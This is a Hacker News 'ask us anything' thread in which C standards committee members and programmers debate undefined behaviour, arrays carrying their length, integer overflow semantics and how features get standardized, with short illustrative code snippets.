Tell HN: C Experts Panel – Ask us anything about C

dang · on April 23, 2021

All: this thread has almost 1000 comments and is paginated, so to see all of it you need to click More at the bottom of the page, or like this:

https://news.ycombinator.com/item?id=22865357&p=2

https://news.ycombinator.com/item?id=22865357&p=3

https://news.ycombinator.com/item?id=22865357&p=4

(Posts like this will go away once we turn off pagination.)

nicoburns · on April 14, 2020

Are there any plans to "clean up C"? A lot of effort has been put into alternative languages, which are great, but there is still a lot of momentum with C, and it seems that a lot of improvements that could be done in a backwards compatible way and without introducing much in the way of complexity. For example:

- Locking down some categories of "undefined behaviour" to be "implementation defined" instead.

- Proper array support (which passes around the length along with the data pointer).

- Some kind of module system, that allows code to be imported with the possibility of name collisions.

msebor · on April 14, 2020

There are "projects" underway to clean up the spec where it's viewed as either buggy, inconsistent, or underspecified. The atomics and threads sections are a coupled of example.

There are efforts to define the behavior in cases where implementations have converged or died out (e.g., twos complement, shifting into the sign bit).

There have been no proposals to add new array types and it doesn't seem likely at the core language level. C's charter is to standardize existing practice (as opposed to invent new features), and no such feature has emerged in practice. Same for modules. (C++ takes a very different approach.)

nabla9 · on April 14, 2020

> no such feature has emerged in practice

Arrays with length constantly emerge among C users and libraries. They are just all incompatible because without standardization there is no convergence.

simias · on April 14, 2020

I think the problem is that C is simply ill-suited for these "high level" constructs. The best you're likely to get is an ad-hoc special library like for wchar_t and wcslen and friends. Do we really want that?

I'd argue that linked list might make a better candidate for inclusions, because I've seen the kernel's list.h or similar implementations in many projects and that's stuff is trickier to get right than stuffing a pointer and a size_t in a struct.

rseacord · on April 14, 2020

Sounds like a good use of standardization. If there is existing implementation practice, please go ahead and submit a proposal. I would be happy to champion such a proposal if you can't attend in person.

nabla9 · on April 14, 2020

It was an observation, not suggestion.

When the language standardization body has not managed to add arrays with length in 48 years, I don't think it should be added at this point. The culture is backward looking and incompatible with modern needs and people involved are old and incompatible with the future (no offense, so am I).

C standardization effort should focus on finishing the language, not developing it to match modern world. I have programmed with C over 20 years, since I was a teenager. It's has long been the system programming language I'm most familiar with. For the last 10 years I have never written an executable. Just short callable functions from other languages. Python, Java, Common Lisp, Matlab, and 'horrors or horrors' C++.

I think Standard C's can live next 50 years in gradual decline as portable assembler called from other languages and compilation target.

If I would propose new extension to C language, I would propose completely new language that can be optionally compiled into C and works side by side with old C code.

apotheon · on April 14, 2020

> If I would propose new extension to C language, I would propose completely new language that can be optionally compiled into C and works side by side with old C code.

There are a few somewhat popular languages that fit that description already, and none of them are suitable replacements for C (as far as I've seen). That's not to say there couldn't be a suitable replacement -- just that nobody in a position to do something about it wants the suitable replacement enough for it to have emerged, apparently.

I suspect the first really suitable complete replacement for C would be something like what Checked C [1] tried to be, but a little more ambitious and willing to include wholly new (but perhaps backward-compatible) features (like some of those you've proposed) implemented in an interestingly new enough way to warrant a whole new compile-to-C implementation. Something like that could greatly improve the use cases where a true C replacement would be most appreciated, and still fit "naturally" into environments where C is already the implementation language of choice via a piecemeal replacement strategy where the first step is just using the new language's compiler as the project compiler front end's drop-in replacement (without having to make any changes to the code at all for this first step).

1: https://www.microsoft.com/en-us/research/project/checked-c/

xtian · on April 14, 2020

Sounds like you are describing Zig. https://ziglang.org

apotheon · on April 16, 2020

I haven't looked at Zig too closely yet (only started just a few minutes ago), but it immediately appears to me that this violates one of the requirements I suggested, as demonstrated by this use-case wish from my previous comment:

> > using the new language's compiler as the project compiler front end's drop-in replacement (without having to make any changes to the code at all for this first step)

I'll look into Zig more, though. Maybe I'll like it.

---

I stand corrected, given my phrasing. I should have specified that it needs to also support incrementally adding the new language's features while most of the code is still unaltered C, rather than (for instance) having to suddenly replace all the includes and function prototypes just because you want to add (in the case of Zig) an error "catch" clause.

xtian · on April 16, 2020

You can use the Zig compiler to compile C with no modifications, and easily call C from Zig or Zig from C, so I'm not sure what more you're hoping for. A language that allows you to mix standard C and "improved C" in the same file sounds like a mess to me.

apotheon · on April 17, 2020

It depends on whether you're talking about an actual whole new, radically different language or something that is essentially C "with improvements". My point is not that C "with improvements" is the ideal approach, only that (at this time, for almost purely social reasons) I don't think C is really subject to replacement except by something that allows you to mix standard C and the "new language" because, apart from specific improvements, they are the same language.

This might come with huge drawbacks, but it still seems like the only socially acceptable way to fully replace C at this time; make it so you can replace it one line of code at a time in existing projects.

ATsch · on April 14, 2020

typedef struct {uint8_t *data; size_t len;} ByteBuf; is the first line of code I write in a C project.

mobilemidget · on April 15, 2020

Could you add some extra information why this is so helpful or handy to have? Think it will benefit readers that are starting out with C etc.

saagarjha · on April 15, 2020

In C, dynamically-sized vectors don’t carry around size information with them, often leading to bugs. This struct attempts to keep the two together.

GoblinSlayer · on April 15, 2020

Memory corruption in sudo password feedback code happened because length and pointer sit as unrelated variables and have to be manipulated by two separate statements every time like some kind of manually inlined function. For comparison putty slice API handles slice as a whole object in a single statement keeping length and pointer consistent.

kkdwivedi · on April 14, 2020

Another option is a struct with a FAM at the end.

  typedef struct {
      size_t len;
      uint8_t data[];
  } ByteBuf;

Then, allocation becomes

  ByteBuf *b = malloc(sizeof(*b) + sizeof(uint8_t) * array_size);
  b->len = array_size;

and data is no longer a pointer.

ATsch · on April 14, 2020

Well, your ByteBuf is still a pointer. You also now need to dereference it to get the length. It also can't be passed by value, since it's very big. You can also not have multiple ByteBufs pointing at subsections of the same region of memory.

Thing is, you rarely want to share just a buffer anyway. You probably have additional state, locks, etc. So what I do is embed my ByteBuf directly into another structure, which then owns it completely:

    typedef struct {
        ...
        ByteBuf mybuffer;
        ...
    } SomeThing;

So we end up with the same amount of pointers (1), but with some unique advantages.

kkdwivedi · on April 14, 2020

Right, totally depends on what you're doing. My example is not a good fit for intrusive use cases.

saagarjha · on April 14, 2020

sizeof(ByteBuf) == sizeof(size_t), and you can pass it by value; I just don't think you can do anything useful with it because it'll chop off the data.

kevin_thibedeau · on April 14, 2020

This will an alignment problem on any platform with data types larger than size_t. You'd need an alignas(max_align_t) on the struct. At which point some people are going to be unhappy about the wasteful padding on a memory constrained target.

benibela · on April 15, 2020

Why not typedef struct {uint8_t *data, dataend} ?

Makes it easier to take subranges out of it

orenht · on April 15, 2020

should be

  typedef struct {uint8_t *data, *dataend}

if I'm not mistaken :)

gkfasdfasdf · on April 15, 2020

What are the advantages of saving the end as a pointer? Genuinely curious. Seems like a length allows the end pointer to be quickly calculated (data + len), while being more useful for comparisons, etc.

benibela · on April 15, 2020

You can remove the first k elements of a view with data += k.

With the length you would need to do data += k; length -= k

Especially if you want to use it as safe iterator, you can do data++ in a loop

zoomablemind · on April 16, 2020

> ...You can remove the first k elements of a view with data += k.

How would you safely free(data) afterwards? You'd need to keep an alloc'ed pointer somehow.

gkfasdfasdf · on April 16, 2020

Got it. That is really neat, going to add to my bag of tricks...

benibela · on April 15, 2020

Right. I always think the pointer declaration is part of the type. (that is why I do not use C. Is there really a good reason for this C syntax?)

enriquto · on April 14, 2020

That's a really bizarre layout for your struct. Why don't you put the length first?

twic · on April 14, 2020

Why would it matter? The bytes aren't inline, this is just a struct with two word-sized fields.

A possible tiny advantage for this layout is that a pointer to this struct can be used as a pointer to a pointer-to-bytes, without having to adjust it. Although i'm not sure that's not undefined behaviour.

epr · on April 15, 2020

I don't think that's undefined behavior. That's how C's limited form of polymorphism is utilized. For example, many data structures behind dynamic languages are implemented in this way. A concrete example would be Python's PyObject which share PyObject_HEAD.

https://github.com/python/cpython/blob/master/Include/object...

ATsch · on April 14, 2020

I'm not sure if it matters. It might be better for some technical reason, such as speeding up double dereferences, because you don't need to add anything to get to the pointer. But to be honest I just copied it out of existing code.

saagarjha · on April 14, 2020

Most platforms have instructions for dereferencing with a displacement.

fulafel · on April 15, 2020

The "existing practice" qualification refers to existing compiler extensions I'd guess. Then lobbying about the feature should be addressed to eg LLVM and GCC developers.

rkangel · on April 14, 2020

> C's charter is to standardize existing practice (as opposed to invent new features)

Passing a pair of arguments (pointer and a length) is surely one of the more universal conventions among C programmers?

cperciva · on April 14, 2020

When they say "existing practice" they mean things already implemented in compilers -- not existing practice among developers.

apotheon · on April 14, 2020

This seems like a poor way to establish criteria for standardization. It essentially encourages non-standard practice and discourages portable code by saying that to improve the language standard we have to have mutually incompatible implementations.

It has been said that design patterns (not just in the GOF sense of the term) are language design smells, implying that when very common patterns emerge it is a de facto popular-uprising call for reform. That, to me, is a more ideal criterion for updating a language standard, but practiced conservatively to avoid too much movement too fast or too much language growth.

On the other hand, I think you might be close to what they meant by "existing practice". I'm just disappointed to find that seems like the probable case (though I think it might also include some convergent evolutionary library innovations by OS devs as well as language features by compiler devs).

cperciva · on April 14, 2020

One of the principles for the C language is that you should be able to use C on pretty much any platform out there. This is one of the reasons that other languages are often written in C.

In order to uphold that principle, it's important that the standard consider not just "is this useful" but "is this going to be reasonably straightforward for compiler authors to add". Seeing that people have already implemented a feature helps C to avoid landing in the "useful feature which nobody can use because it's not widely available" trap. (For example, C99 made the mistake of adding floating-point complex types in <complex.h> -- but these ended up not being widely implemented, so C11 backed that out and made them an optional feature.)

flatfinger · on April 15, 2020

Different implementations are used for different purposes. If 20% of implementations are used for purposes where a feature would be useful, which of the following would be best:

1. Have 10% of implementations support the feature one way, and 10% support it in an incompatible fashion.

2. Require that all compiler writers invest the time and necessary to support the feature without regard for whether any of their customers would ever use it.

3. Specify that implementations may either support the feature or report that they don't do so, at their leisure, but that implementations which claim to support the feature must do so in the manner prescribed by the Standard.

When C89 was written, the Committee decided that rather than recognizing different categories of implementation that support different sets of features, it should treat the question of what "popular extensions" to support as a Quality of Implementation which could be better resolved by the marketplace than by the Committee.

IMHO, the Committee should recognize categories of Safely Conforming Implementation and Selectively Conforming Program such that if an SCI accepts an SCP, and the translation and execution environments satisfy all documented requirements of the SCI and SCP, the program will behave as described by the Standard, or report in Implementation-Defined fashion an inability to do so, period. Any other behavior would make an implementation non-conforming. No "translation limit" loopholes.

apotheon · on April 16, 2020

That's obviously true, but at the same time the specifics of how one chooses to set criteria for inclusion in the standard should probably keep in mind the social consequences. If the intended consequence (e.g. ensuring that implementation is easy enough and desired enough to end up broadly included for portability) and the likely consequence (e.g. reduced standardization of C capabilities in practice, with rampant relianced by developers on implementation-specific behavior to the point almost nobody writes portable code any longer) differ too much, it's time to revisit the mechanisms that get us there.

flatfinger · on April 16, 2020

What is meant by "portable code"? Should it refer only to code that should theoretically be usable on all imaginable implementations, or should it be expanded to include code which may not be accepted by all implementations, but which would have an unambiguous meaning on all implementations that accept it?

Historically, if there was some action or construct that different implementations would process in different ways that were well suited to their target platforms and purposes, but were incompatible with each other, the Standard would simply regard such an action as invoking Undefined Behavior, so as to avoid requiring that any implementations change in a way that would break existing code. This worked fine in an era where people were used to examining upon precedent to know how implementations intended for certain kinds of platforms and purposes should be expected to process certain constructs. Such an approach is becoming increasingly untenable, however.

If instead the Standard were to specify directives and say that if a program starts with directive X, implementations may either process integer overflow with precise wrapping semantics or refuse to process it altogether, if it starts with directive Y, implementations may either process it treating "long" as a 32-bit type or refuse to process it altogether, etc. this would make it much more practical to write portable programs. Not all programs would run on all implementations, but if many users of an implementation that targets a 64-bit platform need to use code that was designed around traditional microcomputer integer types, a directive demanding that "long" be 32 bits would provide a clear path for the implementation to meet its customers' needs.

apotheon · on April 17, 2020

> What is meant by "portable code"? Should it refer only to code that should theoretically be usable on all imaginable implementations, or should it be expanded to include code which may not be accepted by all implementations, but which would have an unambiguous meaning on all implementations that accept it?

That's a good question. I'm not sure I know. I could hazard a guess at what would be "best", but I'm not particularly confident in my thoughts on the matter at this time. As long as how that is handled is thoughtful, practical, consistent, and well-established, though, I think we're much more than halfway to the right answer.

> Historically, if there was some action or construct that different implementations would process in different ways that were well suited to their target platforms and purposes, but were incompatible with each other, the Standard would simply regard such an action as invoking Undefined Behavior, so as to avoid requiring that any implementations change in a way that would break existing code.

If I understand correctly, that would actually be "implementation-defined", not "undefined".

> a directive demanding that "long" be 32 bits would provide a clear path for the implementation to meet its customers' needs

There are size-specific integer types specified in the C99 standard (e.g. `uint32_t`). I use those, except in the most trivial cases (e.g. `int main()`), and limit myself to those size-specific integer types that are "guaranteed" by the standard.

flatfinger · on April 17, 2020

> If I understand correctly, that would actually be "implementation-defined", not "undefined".

That is an extremely common myth. From the point of view of the Standard, the difference between Implementation Defined behavior and Undefined Behavior is that implementations are supposed to document some kind of behavioral guarantee with regard to the former, even in cases where it would be impractical for a particular implementation to guarantee anything at all, and nothing that implementation could guarantee in those cases would be useful.

The published Rationale makes explicit an intention that Undefined Behavior, among other things, "identifies areas of conforming language extension".

> There are size-specific integer types specified in the C99 standard (e.g. `uint32_t`). I use those, except in the most trivial cases (e.g. `int main()`), and limit myself to those size-specific integer types that are "guaranteed" by the standard.

A major problem with the fixed-sized types is that their semantics are required to vary among implementations. For example, given

    int test(uint16_t a, uint16_t b, uint16_t c) { return a-b > c }

some implementations would be required to process test(1,2,3); so as to return 1, and some would be required to process it so as to return 0.

Further, if one has a piece of code which is written for a machine with particular integer types, and a compiler which targets a newer architecture but can be configured to support the old set of types, all one would need to do to port the code to the new platform would be to add a directive specifying the required integer types, with no need to rework the code to use the "fixed-sized" types whose semantics vary among implementations anyway.

jschwartzi · on April 14, 2020

What is your definition of "portable"? Are you using that term to mean "code I write for one platform can run without modification on other platforms" or "the language I use for one platform works on other platforms"?

I think when you get down to the level of C you're looking at the latter much more than the former. C is really more of a platform-agnostic assembler. It's not a design smell to have conventions within the group of language users that are de-facto language rules. For reference, see all the PEP rules about whitespace around different language constructs. These are not enforced.

The whole point of writing a C program is to be close to the addressable resources of the platform, so you'd probably want to expose those low-level constructs unless there's a compelling reason not to. Eliminating an argument from a function by hiding it in a data structure is not that compelling to me since I can just do that on my own. And then I can also pass other information such as the platforms mutex or semaphore representation in the same data structure if I need to.

By the way, that convenient length+pointer array requires new language constructs for looping that are effectively syntactic sugar around the for loop. Or you need a way to access the members of the structure. And syntactic sugar constrains how you can use the construct. So I'm not sure that it adds anything to the language that isn't already there. And the fact that length+pointer is such a common construct indicates that most people don't have any issues with it at all once they learn the language.

vkou · on April 15, 2020

> And the fact that length+pointer is such a common construct indicates that most people don't have any issues with it at all once they learn the language.

Given the prevalence of buffer overflow bugs in computing, I'd say that there are quite a few programmers who have quite a few issues with this concept in practice.

The rest of your arguments are quite sound, but I have to disagree with that one.

apotheon · on April 16, 2020

> What is your definition of "portable"?

In that particular statement at the beginning of my preceding comment, I meant portability across compiler implementations.

> Eliminating an argument from a function by hiding it in a data structure is not that compelling to me since I can just do that on my own.

I meant to refer more to the idea that, when doing it on your own in a particular way, the compiler could support applying a (set of) constraint(s) to prevent overflows (as an example), such that any constraint couldn't be bypassed except by very obviously intentional means. Just automating the creation of the very, very simply constructed "plus a numeric field" struct seems obviously not worth including as a new feature of the standardized language.

> the fact that length+pointer is such a common construct indicates that most people don't have any issues with it

I think you're measuring the wrong kind of problem. Even C programmers with a high level of expertise may have problems with this approach, because it's when programmer error causes a problem not caught by code review or the compiler via buffer overflows (for instance) that we see a need for more.

scythe · on April 14, 2020

>There have been no proposals to add new array types and it doesn't seem likely at the core language level.

One alternative to adding types is to allow enforcing consistency in some structs with the trailing array:

    struct my_obj {
      const size_t n;
      //other variables
      char text[n];
    };

where for simplicity you might only allow the first member to act as a length (and it must of course be constant). The point is that then the initializer:

    struct my_obj b = {.n = 5};

should produce an object of the right size. For heap allocation you could use something like:

    void * vmalloc(size_t base, size_t var, size_t cnt) {
      void *ret = malloc(base + var * cnt);
      if (!ret) return ret;
      * (size_t *) ret = cnt;
      return ret;
    }

saagarjha · on April 14, 2020

What should happen if you reassign the object?

scythe · on April 15, 2020

What do you mean "reassign"?

You can't reassign the length variable since it's marked `const`. You should see something like "warning: assignment discards `const` qualifier from pointer target type" if you pass it to `realloc`, which tells you that you're breaking consistency (I guess this might be UB). You could write `vrealloc` to allow resizing such structs, which would probably be called like:

    my_obj *tmp = vrealloc(obj, sizeof(obj), sizeof(obj->text), obj->n, newsize);

saagarjha · on April 15, 2020

What would you do with the old text? Delete it?

scythe · on April 15, 2020

Could you please be more specific about what you're trying to say? I have no idea what your actual objection is.

jschwartzi · on April 14, 2020

I would love this.

DougGwyn · on April 14, 2020

Actually there was no need to disenfranchise non-twos-complement architectures. Now that SIMH has a CDC-1700 emulation, I had planned on producing a C system for it as an example for students who have never seen such a model.

flatfinger · on April 15, 2020

Rather than trying to decide whether to require that all implementations must use two's-complement math, or suggest that all programs should support unusual formats, the Standard should recognize some categories of implementations with various recommended traits, and programs that are portable among such implementations, but also recognize categories of "unusual" implementations.

Recognizing common behavioral characteristics would actually improve the usability of arcane hardware platforms if there were ways of explicitly requesting the commonplace semantics when required. For example, if the Standard defined an intrinsic which, given a pointer that is four-byte aligned, would store a 32-bit value with 8 bits per byte little-endian format, leaving the any bits beyond the eighth (if any) in a state which would be compatible with using "fwrite" to an octet-based stream, an octet-based big-endian platform could easily process that intrinsic as a byte-swap instruction followed by a 32-bit store, while a compiler for a 36-bit system could use a combination of addition and masking operations to spread out the bits.

saagarjha · on April 15, 2020

This sounds like something memcpy would do already for you?

a1369209993 · on April 15, 2020

A 36-bit system with (it sounds like) 9-bit bytes stores bit 8 of a int in bit 8 of a char, and bit 9 of the int in bit 0 of the next char; memcpy won't change that. They're asking for somthing like:

  unsigned int x = in[0] + 512*in[1] + 512*512*in[2] + 512*512*512*in[3];
  /* aka x = *(int*)in */
  
  out[0] = x & 255; x>>=8;
  out[1] = x & 255; x>>=8;
  out[2] = x & 255; x>>=8;
  out[3] = x & 255;
  /* *not* aka *(int*)out = x */

flatfinger · on April 15, 2020

The amount of effort for a compiler to process optimally all 72 variations of "read/write a signed/unsigned 2/4/8-byte big/little-endian value from an address that is aligned on a 1/2/4/8-byte boundary" would be less than the amount of effort required to generate efficient machine code for all the ways that user code might attempt to perform such an operation in portable fashion. Such operations would have platform-independent meaning, and all implementations could implement them in conforming fashion by simply including a portable library, but on many platforms performance could be enormously improved by exploiting knowledge of the target architecture. Having such functions/intrinsics in the Standard would eliminate the need for programmers to choose between portability and performance, by making it easy for a compiler to process portable code efficiently.

a1369209993 · on April 15, 2020

I'm not disagreeing, just showing code to illustrate why memcpy doesn't work for this. Although I do disagree that writing a signed value is useful - you can eliminate 18 of those variations with a single intmax_t-to-twos-complement-uintmax_t function (if you drop undefined behaviour for (unsigned foo_t)some_signed_foo this becomes a no-op). A set of sext_uintN functions would also eliminate 18 read-signed versions. Any optimizing compiler can trivially fuse sext_uint32(read_uint32le2(buf)), and minimal implementations would have less boilerplate to chew through.

flatfinger · on April 15, 2020

> Although I do disagree that writing a signed value is useful

Although the Standard defines the behavior of signed-to-unsigned conversion in a way that would yield the same bit pattern as a two's-complement signed number, some compilers will issue warnings if a signed value is implicitly coerced to unsigned. Adding the extra 18 forms would generally require nothing more than defining an extra 24 macros, which seems like a reasonable way to prevent such issues.

a1369209993 · on April 16, 2020

Fair point; even if the combinatorical nature of it is superficially alarming, that's probably not a productive area to worry about feature creep in.

flatfinger · on April 16, 2020

72 static in-line functions. If a compiler does a good job of handling such things efficiently, most of them could be accommodated by chaining to another function once or twice (e.g. to read a 64-bit value that's known to be at least 16-bit aligned, on a platform that doesn't support unaligned reads, read and combine two 32-bit values that are known to be 16-bit likewise).

Far less bloat than would be needed for a compiler to recognize and optimize any meaningful fraction of the ways people might write code to work around the lack of portably-specified library functions.

saagarjha · on April 15, 2020

Ah, I see.

bear8642 · on April 14, 2020

>clean up the spec

Would this involve further specification of bitfields? Feel implementation defined nature of bitfields limits potential

saagarjha · on April 14, 2020

What parts of bitfields are implementation defined?

bear8642 · on April 15, 2020

looking here https://en.cppreference.com/w/c/language/bit_field seems quite a bit. My main thought was how field's laid out in memory. Know would be big change with endianness but thought a standard check might be useful...?

flatfinger · on April 16, 2020

> C's charter is to standardize existing practice (as opposed to invent new features), and no such feature has emerged in practice. Same for modules. (C++ takes a very different approach.)

One thing that I'd really like to see would be some new categories of compliance. At present, the definition of "conforming C program" makes it possible to accomplish any task that could be done in any language with a "conforming C program", since the only thing necessary for something to be a conforming C program would be for there to exist some conforming implementation in the universe that accepts it. Unfortunately, the Standard says absolutely nothing useful about the effect of attempting to use an arbitrary conforming C program with an arbitrary conforming C implementation. It also fails to define a set of programs where it even attempts to say much of anything useful about the behavior of a freestanding implementation (since the only possible observable behavior of a strictly conforming program on a freestanding implementation would be `while(1);`).

I would propose defining the terms "Safely Conforming Implementation" and "Selectively Conforming Program" such that feeding any SCP to any SCI, in circumstances where the translation and execution environments satisfy all requirements documented for the program and implementation, would be required not to do anything other than behave as specified, or indicate in documented fashion a refusal to do so. An implementation that does anything else when given a Selectively-Conforming Program would not be Safely Conforming, and a program which a Safely Conforming Implementation could accept without its behavior being defined thereon would not be a Selectively Conforming Program.

While it might seem awkward to have many implementations support different sets of features, determining whether a Safely Conforming Implementation supports all the features needed for a Selectively Conforming Program would be trivially easy: feed the program to the implementation and see if it accepts it.

I think there's a lot of opposition to "optional" features because of a perception that features that are only narrowly supported are failures. I would argue the opposite. If 20% of compilers are used by people who would find a feature useful, having the feature supported by that 20% of compilers, while the maintainers of the other 80% direct their effort toward things other than support for the feature, should be seen as a superior outcome to mandating that compiler writers waste time on features that won't benefit their customers.

Realistically speaking, it would be impossible to define a non-trivial set of programs that all implementations must process in useful fashion. Instead of doing that, I'd say that the question of whether an implementation can usefully process any program is a Quality of Implementation issue, provided that implementations reject all programs that they can't otherwise process in any other conforming fashion.

rseacord · on April 14, 2020

I think we are always looking at ways to "clean up C" but that this has to be done very carefully not to break existing code. For example, the committee recently voted to remove support for function definitions with identifier lists from C2x http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2432.pdf At least one vendor was not very happy with this decision.

Undefined behaviors tend to be undefined for a reason and shouldn't be thought of as defects in the standard. In my years on the committee, I have always argued to define as much behavior as possible and to as narrowly define undefined behaviors as possible.

We also had a recent discussion about adding additional name spaces (when discussing reserved identifiers), but it didn't gain much traction.

tropo · on April 14, 2020

C has strayed very far from the original intent because compiler authors prioritized benchmark results at the expense of real-world use cases. This bad trend needs to be reversed.

Consider signed integer overflow.

The intent wasn't that the compiler could generate nonsense code if the programmer overflowed an integer. The intent was the the programmer could determine what would happen by reading the hardware manual. You'd wrap around if the hardware naturally would do so. On some other hardware you might get saturation or an exception.

In other words, all modern computers should wrap. That includes x86, ARM, Power, Alpha, Itanium, SPARC, and just about everything else. I don't believe you can even buy non-wrapping hardware with a C99 or newer compiler. Since this is likely to remain true, there is no longer any justification for retaining undefined behavior that is getting abused to the detriment of C users.

namibj · on April 14, 2020

There are some add-with-saturation opcodes in 8bit-element-size SIMD ISAs, I think that includes x86_64, some recent Nvidia GPUs, and the Raspberry Pi 1's VideoCore IV's strange 2D-register-file vector unit made for implementing stuff like VP8/H.264 on it. They are afaik always opt-in, though.

favorited · on April 14, 2020

If most C developers wanted to trade the performance they get from the compiler being able to assume `n+1 > n` for signed integer n, it would happen.

flatfinger · on April 15, 2020

Most of the useful optimizations that could be facilitated by treating integer overflow as jump the rails optimization could be facilitated just as well by allowing implementations to behave as though integers may sometimes, non-deterministically, be capable of holding values outside their range. If integer computations are guaranteed never to have side effects beyond yielding "weird" values, programs that exploit that guarantee may be processed to more efficient machine code than those which must avoid integer overflow at all costs.

saagarjha · on April 15, 2020

How is this better behavior?

flatfinger · on April 15, 2020

Many programs are subject to two constraints:

1. Behave usefully when practical, if given valid data.

2. Do not behave intolerably, even when given maliciously crafted data.

For a program to be considered usable, point #1 may be sometimes be negotiable (e.g. when given an input file which, while valid, is too big for the available memory). Point #2, however, should be considered non-negotiable.

If integer calculations that overflow are allowed to behave in loosely-defined fashion, that will often be sufficient to allow programs to meet requirement #2 without the need for any source or machine code to control the effects of overflow. If programmers have to take explicit control over the effects of overflow, however, that will prevent compilers from making of the any useful overflow-related options that would be consistent with loosely-defined behavior.

Under the kind of model I have in mind, a compiler would be allowed to treat temporary integer objects as being capable of holding values outside the range of their types, which would allow a compiler to optimize e.g. x*y/y to x, or x+y>y to x>0, but the effects of overflow would be limited to the computation of potentially weird values. If a program would meet requirements regardless of what values a temporary integer object holds, allowing such objects to acquire such weird values may be more efficient than requiring that programs write code to prevent computation of such values.

clarry · on April 15, 2020

Intolerable is too situation specific.

Integer overflows that yield "weird values" in one place can easily lead to disasterous bugs in another place. So the safest thing in general would be to abort on integer overflow. But I'm sure there are applications where that, too, is intolerable. Kinda hard to have constraint 2 then.

flatfinger · on April 15, 2020

Having a program behave in unreliably uselessly unpredictable fashion can only be tolerable in cases where nothing the program would be capable of doing would be intolerable. Such situations exist, but they are rare.

Otherwise, the question of what behaviors would be tolerable or intolerable is something programmers should know, but implementations cannot. If implementations offer loose behavioral guarantees, programmers can determine if they meet requirements. If an implementation offers no guarantees whatsoever, however, that is not possible.

If the only thing about overflow is that temporary values may hold weird results, and if certain operations upon a "weird" result (e.g. assignment to anything other than an automatic object whose address is never taken) will coerce it into a possibly-partially-unspecified number within type's range, then a program may ensure that behavior will be acceptable regardless of what weird values result from computation.

According to the published Rationale, the authors of C89 would have expected that something like:

    unsigned mul(unsigned short x, unsigned short y)
    { return (x*y); }

would on most implementations yield an arithmetically-correct result even for values of (x*y) between INT_MAX+1U and UINT_MAX. Indeed, I rather doubt they could imagine any compiler for a modern system would do anything other than yield an arithmetically-correct result or--maybe--raise a signal or terminate the program. In some cases, however, that exact function will disrupt the behavior of its caller in nonsensical fashion. Do you think such behavior is consistent with the C89 Committee's intention as expressed in the Rationale?

clarry · on April 15, 2020

> Do you think such behavior is consistent with the C89 Committee's intention as expressed in the Rationale?

No, but in general I'm ok with integer overflows causing disruptions (and I'm happy that compilers provide an alternative, in the form of fwrapv, for those who don't care).

I do think that the integer promotions are a mistake. I would also welcome a standard, concise, built-in way to perform saturating or overflow-checked arithmetic that both detects overflows as well as allows you to ignore them and assume an implementation-defined result.

As it is, preventing overflows the correct way is needlessly verbose and annoying, and leads to duplication of apis (like reallocarray).

flatfinger · on April 15, 2020

I wouldn't mind traps on overflow, though I think overflow reporting with somewhat loose semantics that would allow an implementation to produce arithmetically correct results when convenient, and give a compiler flexibility as to when overflow is reported, could offer much better performance than tight overflow traps. On the other hand, the above function will cause gcc to silently behave in bogus fashion even if the result of the multiplication is never used in any observable fashion.

whelming_wave · on April 15, 2020

It lets you check that a+b > a for unknown unsigned b or signed b known > 0, to make sure addition didn’t overflow. I’m rather certain all modern C compilers will optimize that check out.

mbauman · on April 14, 2020

Does it concern you how aggressively compiler teams are exploiting UB?

Spivak · on April 14, 2020

You do have to understand that compiler teams aren't saying something like "this triggers UB, quick just replace it with noop." It's just something that naturally happens when you need to reason about code.

For example, consider a very simple statement.

    let array[10];
    let i = some_function();
    print(array[i]);

The function might not even be known to the compiler at compilation time if it was from a DLL or something.

But the compiler is like "hey! you used the result of this function as an index for this array! i must be in the range [0, 10)! I can use that information!"

gwd · on April 14, 2020

> But the compiler is like "hey! you used the result of this function as an index for this array! i must be in the range [0, 10)! I can use that information!"

As a developer who has seen lots of developers (including himself) make really dumb mistakes, this seems like a very strange statement.

Imagine if you hired a security guard to stand outside your house. One day, he sees you leave the house and forget to lock the door. So he reasons, "Oh, nothing important inside the house today -- guess I can take the day off", and walks off. That's what a lot of these "I can infer X must be true" reasonings sounds like to me: they assume that developers don't make mistakes; and that all unwanted behavior is exactly the same.

So suppose we have code that does this:

  int array[10];
  int i = some_function();

  /* Lots of stuff */
  if ( i > 10 ) {
    return -EINVAL;
  }

  array[i] = newval;

And then someone decides to add some optional debug logging, and forgets that `i` hasn't been sanitized yet:

  int array[10];
  int i = some_function();

  logf("old value: %d\n", array[i]);

  /* Lots of stuff */

  if ( i > 10 ) {
    return -EINVAL;
  }

  array[i] = newval;

Now reading `array[i]` if `i` > 10 is certainly UB; but in a lot of cases, it will be harmless; and in the worst case it will crash with a segfault.

But suppose a clever compiler says, "We've accessed array[i], so I can infer that i < 10, and get rid of the check entirely!" Now we've changed an out-of-bounds read into an out-of-bounds write, which has changed worst-case a DoS into a privilege escalation!

I don't know whether anything like this has ever happened, but 1) it's certainly the kind of thing allowed by the spec, 2) it makes C a much more dangerous language to deal with.

btilly · on April 14, 2020

Per https://lwn.net/Articles/575563/, Debian at one point found that 40% of the C/C++ programs that they have are vulnerable to known categories of undefined behavior like this which can open up a variety of security holes.

This has been accepted as what to expect from C. All compiler authors think it is OK. People who are aware of the problem are overwhelmed at the size of it and there is no chance of fixing it any time soon.

The fact that this has become to be seen as normal and OK, is an example of Normalization of Deviance. See http://lmcontheline.blogspot.com/2013/01/the-normalization-o... for a description of what I mean. And deviance will continue to be normalized right until someone writes an automated program that walks through projects, finds the surprising undefined behavior, and tries to come up with exploits. After project after project gets security holes, perhaps the C language committee will realize that this really ISN'T okay.

And the people who already migrated to Rust will be laughing their asses off in the corner.

pjmlp · on April 15, 2020

Just to put in context how much they care, see when Morris worm happened.

asveikau · on April 14, 2020

> in a lot of cases, it will be harmless; and in the worst case it will crash with a segfault.

I am not sure if a segfault is always the worst case. It could be by some coincidence that array[i] contains some confidential information [maybe part of a private key? 32 bits of the user's password?] and you've now written it to a log file.

I know it's hard to imagine a mis-read of ~32 bits would have bad consequences of that sort, but it's not out of the question.

saagarjha · on April 14, 2020

Misreads of much less than that have been exploitable in the past.

asveikau · on April 15, 2020

Depends a lot on the specifics. For example heartbleed was a misread that led to the buffer being sent on the socket. And I think it was more than 32 bits. 32 bits of garbage into a log file that needs privileges to read sounds a tad less scary, but like I say, not out of the question to be harmful.

memling · on April 15, 2020

> Depends a lot on the specifics. For example heartbleed was a misread that led to the buffer being sent on the socket. And I think it was more than 32 bits. 32 bits of garbage into a log file that needs privileges to read sounds a tad less scary, but like I say, not out of the question to be harmful.

If you can do it a lot of times, though, that changes matters.

